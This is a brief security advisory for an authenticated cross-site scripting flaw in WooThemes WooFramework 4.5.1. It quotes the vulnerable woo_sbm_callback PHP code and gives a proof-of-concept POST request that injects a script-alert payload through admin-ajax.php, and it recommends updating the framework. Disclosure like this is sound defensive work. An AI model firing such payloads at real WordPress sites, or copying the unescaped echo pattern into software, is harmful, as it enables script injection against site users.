------------------------------------------------------------------------------
WooThemes WooFramework 4.5.1 Authenicated Cross Site Scripting (XSS)
------------------------------------------------------------------------------

[-] Vulnerability Description:

https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

the vulnerability is in  function "woo_sbm_callback":
Vuln Code:
function woo_sbm_callback() {
    ...
    $save_type = $_POST['type'];
    ...
    if($save_type == 'woo_sbm_get_links'){

        $data = $_POST['data'];
        parse_str($data,$data_array);
        $type = $data_array['type'];
        $slug = $data_array['slug'];
        $name = $data_array['name'];
        $id = $data_array['id'];
        ...
        ...
        echo "$type|$name|$slug|$id|$url|$conditional";

    }
    ...
}
add_action( 'wp_ajax_woo_sbm_post_action', 'woo_sbm_callback' );

[-] Proof Of Concept:
URL:
http://localhost/x/wordpress/wp-admin/admin-ajax.php?action=woo_sbm_post_action
Post Data: type=woo_sbm_get_links&data=type=<script>alert(1)</script>

[-] Fix / Solution:
Update to latest framework.